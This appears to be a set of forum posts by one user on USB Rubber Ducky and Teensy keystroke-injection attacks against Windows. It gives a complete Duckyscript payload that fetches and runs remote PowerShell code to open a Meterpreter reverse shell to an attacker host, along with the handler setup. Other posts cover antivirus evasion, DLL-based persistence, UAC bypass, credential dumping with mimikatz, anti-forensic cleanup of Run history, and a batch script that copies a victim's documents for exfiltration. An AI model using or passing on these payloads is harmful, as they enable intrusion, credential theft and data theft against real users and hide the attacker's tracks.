Xcellerator

You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit) The x86 Meterpreter reverse http sis here: payload/windows/meterpreter/reverse_https (The one I expect you used) The x64 one is here payload/windows/x64/meterpreter/reverse_https Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode.

Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never being detected by an AV. As far as persistence goes, the startup folder is one way, but is usually picked up by AV. Or put Meterpreter into a dll file and call it "fxsst.dll" and through it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service.

Hey guys, I've been playing around with powershell and also been looking into Powersploit (I really suggest you look into powersploit - its got some amazing stuff in it!). Anyway, I came across this: http://www.pentestgeek.com/2013/09/18/invoke-shellcode/, and I thought it would work great as a ducky script! First, here is the actual Duckyscript code you need to run on the target machine, ONLY AFTER setting up the listener in metasploit below. DELAY 5000 GUI r DELAY 500 STRING cmd ENTER STRING cd %TEMP% ENTER STRING copy con met.cmd ENTER STRING start C:/Windows/System32/Ribbons.scr /s ENTER STRING powershell "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/14bZZ0c'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost <IP_ADDRESS> -Lport <PORT> -Force" ENTER CTRL z ENTER DELAY 100 STRING met.cmd && exit ENTER Just make sure you remember to change <IP_ADDRESS> to your actual IP Address and <PORT> to the port you want to run the session over. Now, in a terminal window in a linux distro (make sure you have metasploit installed), make a file with this as it's contents, obviously changing the values in < and > to match your settings: use exploit/multi/handler set payload windows/meterpreter/reverse_https set LHOST <IP_ADDRESS> set LPORT <PORT> exploit -j -z name it whatever you want with a .rc extension. ### MAKE SURE YOU DO THIS BEFORE YOU EXECUTE THE PAYLOAD ON THE MACHINE! IT IS A REVERSE SHELL, NOT A BIND SHELL### Run this in the terminal: msfconsole -r ./fileyoujustmade.rc Let everything start up and ensure there are no errors. (You might get an error with a port already being in use on your machine, or permissions problems if you try and use port 443 on Debian systems without being root). Now, run the payload from the ducky on the target machine. Once you see the screensaver appear, you're good to remove the Ducky. It may take up to 10 seconds for you to receive your shell as it has to connect out to the internet to load the Invoke-Shellcode plugin and then actually generate and load the meterpreter into memory. Issues I occured: I found that my metasploit just sat at "Meterpreter shell 1 opened at....". This could be because it attempts to automatically run the smart_migrate module upon connection. All I did to resolve this was to hit enter to get the msf prompt back, and then connect into the meterpreter session and run smart_migrate automatically. Smart_migrate can be found at post/windows/manage/smart_migrate in the metasploit trunk. Although, be warned - smart_migrate automatically attempts to migrate into explorer.exe which ##DOES NOT## have an administrative privileges. So, you'll have to utilise the post modules to grant yourself admin and eventually even SYSTEM (If you want to dump firefox/chrome/IE passwords, hashes or use mimikatz or WCE to get the wDigest passwords from memory). I'd recommend the bypass_uac or ask modules to grab yourself admin - particularly ask in lower security environments. For the Forensics Conscious: If you're concerned about remaining undetected on the machine you've got the shell on, then I recommend the following steps: 1. Delete met.cmd from %TEMP% - You don't want to come back to bite you on the ass once you're done with the machine. 2. Kill the powershell.exe process once you've migrated out of it. Hope you all enjoy! I know many of you will find good use of this, and as always - use responsibly! ;-P

It's as you said, replicating the content of the shortcut file. I imagine it would shave off a second or two doing it that way, rather than going through the windows GUI.

This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level.

This can be done, except it's easier (and better) to encode the exe in Base-64, type out a VBS file to decode the Base-64, and then run it. In theory, I see no reason why a PS/2 adapter wouldn't work, the only problem being that PS/2 requires a reboot to work, so you'd need to log in again and anyway - lengthy periods of time (like rebooting) is what the ducky is trying to avoid..

The rubber ducky is just a programmable keyboard device. Anything that you can't do with a keyboard, you can't do with a rubber ducky. So, in order to use the utility manager payload, you need to be at a desktop - not a lock screen or a logos prompt.

I did the same thing as this payload except with utilman.exe (Utility Manager) instead of sethc.exe. I believe osk.exe (on screen keyboard) is also ran as SYSTEM on any windows machine, so would also work.

I'm working with a Teensy++ 2.0 board which only has 128K of onboard flash memory. I'm using it as HID + Disk, so as well as program that contains the keystrokes, I also have it doubled up as mass storage. The files I need to on the disk ever so slightly exceed the limit. I literally need to lose a couple of K. Is there a way of stripping out the unnecessary data from the files? Like all the NTFS permissions that windows uses (I'm in Mint now - no longer windows), and other data? Thanks in advance for any advice..

Well, the Ducky firmware is specific to the hardware that makes the duck a duck, and all Teensy boards have a separate boot loader that you aren't advised to overwrite unless you know exactly what your doing. You can write out code in C++ like I do with my Teensy++ 2.0, using the Arduino IDE. This is what happened in the old days before the Ducky was being manufactured, everyone used Teensys and wrote the code manually and flashed it. You can use the SD card adapter as mass storage along with HID keyboard functionality, so for exfiltration your set. Without it you only have ~128K of flash memory and usually have to resort to FTPs (at least that's my solution!)

Or you can try a tool called Mpress. I use a Teensy board which only has 128K of memory. Using Mpress I got mimikatz down from 134K to 61K. Still runs perfectly, I've encountered no execution issues whatsoever. Works with Win32+ binaries as well, so you get 64-Bit support too.

That's great, the /S flag makes it recursive (similar to -R in *nix), and the double quotes encapsulate the whole string rather than breaking at the space. Thanks for sharing!

Sorry, I should have been clearer. By default, windows hides the extension on files that it recognises. That means that the test.txt file in your documents is actually test.txt.txt. (It adds the .txt automatically). So rename the file in your documents so that it just says "test", rather than "test.txt". Xcopy shouldn't need any more parameters than that, so try in a command prompt, xcopy %USERPROFILE%\Documents\test.txt %USERPROFILE%\Desktop\ Which SHOULD copy test.txt to your desktop.

Well, only in that it's a similar case of reverse engineering a USB device.

Add a 100/200 ms delay after typing exit before hitting enter. I had this problem once, I fixed it by adding very short delays (eventually I worked out I only need 50ms ones). STRING exit DELAY 100 ENTER

Look into something called "PSGroove" and "PSFreedom". A few years ago, when the first jailbreak for the PS3 was released, a guy called "Mathieulh" reverse engineered the USB device that did and released a version that you could flash to pretty much anything "PSGroove" and a version for iBoot on Apple devices "PSFreedom". At the time, I remember he published how he reversed engineered it (and I think the BBC did an article on him as well). Don't know if this will let you re-program the device you've got, but it may let you reverse engineer it to see how similar it is to the ducky.

The unrecognised java command in the prompt can be fixed by adding the Java binary install directory to the %PATH% variable. This can be done in system properties from my computer.

Just alter your ducky script to type out the password for the administrative user and then hit enter instead of moving to "yes" or the Alt-Y combo. Should work fine.

You can delete the entire history from the Run dialog using reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f or, you can specify what exact command you want removed with this: for /f "tokens=1 delims= " %%A in ('reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ^| findstr "powershell Start-Process cmd.exe -Verb RunAs"') do (reg delete HKCU\Software\Microsoft\Windows\CUrrentVersion\Explorer\RunMRU /v %%A /f) or change "powershell Start-Process cmd.exe -Verb RunAs" to anything you like.

Make a new DuckSlurp.bat file and paste this into it: @echo off set destination=%~d0\DuckSlurp\%COMPUTERNAME% mkdir %destination% if Exist %USERPROFILE%\Documents ( xcopy %USERPROFILE%\Documents\test.txt %destination% >>nul ) @cls taskkill /f /IM cmd.exe @exit Make a text file in your documents called "test.txt". It seems that the DuckyWait.bat script is running fine as it's actually calling the right file on the USB, so just run this script (the one above) normally (not with the Ducky). This is the actual script from my personal setup, so I can confirm it works fine. If this works, then just change the line xcopy %USERPROFILE%\Documents\test.txt %destination% >>nul to xcopy %USERPROFILE%\Documents\* %destination% >>nul and it should copy over everything in documents. (The * is also called a 'wildcard' means everything in the directory)

Or just issue "start C:\Windows\System32\Ribbons.scr -s" at the start of the DuckSlurp.bat file on the usb. The screensaver will activate and the rest of the batch file will run behind it!

iPhones will not work with any HID device because they are not supported at all (you cannot even buy Apple ones for them!) iPads do work, as long as you have a half-decent adapter. There's been people saying that cheaper knock-off ones don't work very well. I don't have an iPad Mini, so cannot say - but I'd be interested to hear if anyone does have one. The full documentation for Keyboard shortcuts on iOS is here: https://developer.apple.com/library/ios/documentation/IDEs/Conceptual/xcode_help-command_shortcuts/Introduction/Introduction.html#//apple_ref/doc/uid/TP40010560 In case you aren't sure, Command Key == Windows Key (GUI key) Option Key == Alt Key

I don't have a ducky because I already had a Teensy++ 2.0 from before. If you don't mind writing all your scripts in C, then you're fine. The selling point is very much the fact that it is so simple to script for. Writing out longer scripts in C takes ages.. -.-

Wow, glad to see the progress this payload has made! Quick execution of this (particularly on stuff like personal laptops with only one user) is a fast track to owning the first box on the network! Would be great to include some form of encryption before FTPing the files over, though! Perhaps hosting a truecrypt binary on the FTP server, downloading it first to encrypt, then upload the TC file? Just an idea, but I'll look into it..!

Thanks! Just wanted to double check...!